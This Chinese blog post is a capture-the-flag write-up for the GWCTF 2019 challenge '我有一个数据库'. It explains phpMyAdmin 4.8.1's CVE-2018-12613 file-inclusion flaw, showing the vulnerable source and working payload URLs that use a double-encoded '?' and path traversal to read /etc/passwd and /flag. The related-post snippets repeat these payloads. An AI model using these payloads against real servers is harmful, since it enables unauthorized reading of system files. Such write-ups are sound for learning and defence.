[GWCTF 2019]我有一个数据库(CVE-2018-12613)

最新推荐文章于 2024-03-30 08:54:43 发布
最新推荐文章于 2024-03-30 08:54:43 发布
阅读量265 收藏
点赞数 1
分类专栏: # web安全 文章标签: php web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/128782400
版权

目录

信息收集

漏洞查找

漏洞类型

漏洞原理

漏洞利用

payload

补充

信息收集

  • 开局乱码

<!DOCTYPE html>
<html>
<head>
	<title>空的数据库</title>
</head>
<body>
	<h1>我有一个数据库,但里面什么也没有~</h1>
	<h1>不信你找</h1>
</body>
</html>

  • 目录扫描

index.html;phpinfo.php;robots.txt;phpmyadmin/

查看phpmyadmin得到相应的版本

 

  • 服务器版本: 5.5.62 - MySQL Community Server (GPL)
  • Apache/2.4.29 (Ubuntu)
  • 数据库客户端版本: libmysql - mysqlnd 5.0.12-dev - 20150407 - $Id:
  • PHP 扩展: mysqli
  • PHP 版本: 7.2.24-0ubuntu0.18.04.1
  • phpmyadmin版本信息: 4.8.1

查看phpinfo.php

PHP Version 7.2.24-0ubuntu0.18.04.1

漏洞查找

漏洞类型

phpMyAdmin4.8.1

谷歌搜索phpMyAdmin4.8.1发现CVE-2018-12613漏洞(phpmyadmin 4.8.0-4.8.1

漏洞原理

在index.php

$target_blacklist = array (
    'import.php', 'export.php'
);

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

Core::checkPageValidity($_REQUEST['target'])在libraries\classes\Core.php

urldecode() 我们可以利用这个函数绕过白名单检测,只要把?两次url编码为 %253f 即可

public static function checkPageValidity(&$page, array $whitelist = [])
{
    if (empty($whitelist)) {
        $whitelist = self::$goto_whitelist;
    }
    if (! isset($page) || !is_string($page)) {
        return false;
    }

    if (in_array($page, $whitelist)) {
        return true;
    }

    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }

    $_page = urldecode($page);
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }

    return false;
}

漏洞利用

http://IP/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../etc/passwd

http://IP/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../etc/passwd

payload

先访问etc/passwd

http://ip/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../etc/passwd

访问/flag

http://ip/phpmyadmin/index.php?target=db_datadict.php%3f/../../../../../../flag,得到flag

补充

<?php

if (isset($_GET['a_.c']))

    echo '1';

?>

传参?a[.c=1

coleak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUU刷题--[GWCTF 2019]我有一个数据库
weixin_48631429的博客
12-02 549
我有一个数据库 打开看到这样一堆文字,读不懂,也没有其他的信息。 怎么想也想不到该怎么做,buu还不能扫描。所以只能看了wp,看到有一个/phpmyadmin,回来开始想怎么做 phpmyadmin版本信息4.8.1,搜索一下有什么漏洞。 任意文件包含:那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...
BUU [GWCTF 2019]我有一个数据库
cadandme的博客
05-11 204
刷了一道web题,记录做题过程。 打开页面看到 打开源码,尝试解码。试了UTF-8,尝试把得到的数据导成文档。 结果是乱码,走入了死胡同。数据库数据库,又想到扫描目录,在kali扫描,发现东西 先看txt, 再看phpinfo.php 到这里彻底不懂了,瞎搞了没看出东西后,看了大佬的wp,说是phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 后面跟着wp来,可惜在构造Pyaload使用时显示 index.php?target=db_sql.php%253f/
BUUCTF[GWCTF 2019]我有一个数据库
LSYZWF的博客
10-12 1731
文章目录题目解答漏洞分析知识点 题目 链接:https://buuoj.cn/challenges#[GWCTF%202019]%E6%88%91%E6%9C%89%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93 解答 1、乱码,看不懂 2、F12 同时结合题目可能与数据库有关 3、可以尝试扫描相关数据库的端口是否开放,也可以通过数据库工具进行连接测试,但是这里使用的是phpmyadmin 随便翻阅了一下,得不到有用的东西,也证实了上面什么都没有的说法 4、从
[GWCTF 2019]我有一个数据库
最新发布
wikey 的博客
03-30 202
看到这个phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置。直接就是乱码,联想到题目的数据库,那问题就i一定出现在数据库里,可以用两个扫描工具扫描试试。
BUU[GWCTF 2019]我有一个数据库
qq_62078839的博客
04-26 1821
打开链接 一堆乱码,查看源代码也没什么信息可提取,利用目录扫描器,看能不能扫出什么东西 扫到了一个phpmyadmin 进去看看 这里的版本号为4.8.1,而phpmyadmin在4.8.0以及4.8.1的版本号中有文件包含漏洞 [PHPMYADMIN]CVE-2018-12613 我们试试读取看是否成功 index.php?target=sql.php?/../../../../../../../../../etc/passwd 成功 尝试读取flag inde...
[GWCTF 2019]我有一个数据库1
qq_63169208的博客
06-26 444
进来是一堆乱码,查看源码,抓包都没发现什么,这个时候就只能用dirsearch去扫一下了可以看到有个/phpmyadmin界面访问一下得到这样一个界面,关注的点应该在下面这个,一般这种都是查一下版本漏洞这个是存在这样一个漏洞的phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)接下来执行一下漏洞复现payload:phpmyadmin/?target=db_sql.php%253f/../../../../../../../../etc/passwd执行成功,既然/etc/pa
CVE-2018-18778.docx
07-23
CVE-2018-18778 ,mini_httpd任意文件读取漏洞,
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
CVE-2018-3191利用exp
01-08
打包的weblogic-CVE-2018-3191 exp配合ysoserial获取shell权限
[GWCTF 2019]我有一个数据库 1
qq_43618536的博客
07-21 664
[GWCTF 2019]我有一个数据库 1
第三十九题——[GWCTF 2019]我有一个数据库
分享简单的安全技术
04-24 317
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,一堆乱码,使用diirsearch获取到了phpmyadmin这个目录 第二步:访问phpadmin目录,查看到了当前版本4.8.1,经查该版本有远程文件包含漏洞,与第一题漏洞一样 第三步:查看漏洞发现需要上传target参数且满足一定要求,构造:phpmyadmin/?target=db_sql.php?/../../../../../../flag获取flag ...
NO.2-6 [GWCTF 2019]我有一个数据库
nigo134的博客
07-26 159
该题考查cve-2018-12613-PhpMyadmin后台文件包含漏洞 使用御剑进行扫描发现phpmyadmin/目录,无需密码便可以进入 查看相关版本信息 百度一下发现phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) &&amp..
GWCTF 2019-我有一个数据库
paidx0
08-17 224
GWCTF 2019-我有一个数据库 像这种什么也没有告诉的题目,一般先去看一看robots.txt,还是没有就githack,dirsearch一下,一般总会给点什么东西的。 再不然就御剑扫呗 一般先注意版本,然后去找有什么爆出的漏洞可以利用 这里phpmyadmin4.8.1确实有可以利用的 phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613) 漏洞利用 payload ?target=db_sql.php%253f/../../../../../../../../etc
[GWCTF2019]huyao
07-28
\[GWCTF2019\]huyao是一个CTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,它可能涉及到频域盲水印隐写。具体的解题方法和细节需要参赛者在比赛中进行分析和解决。 #### 引用[.reference_title] - *1* [BUUCTF MISC刷题笔记(三)](https://blog.csdn.net/weixin_45696568/article/details/116421340)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [BUUCTF misc 解题记录 二(超级详细)](https://blog.csdn.net/qq_51090016/article/details/115712647)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值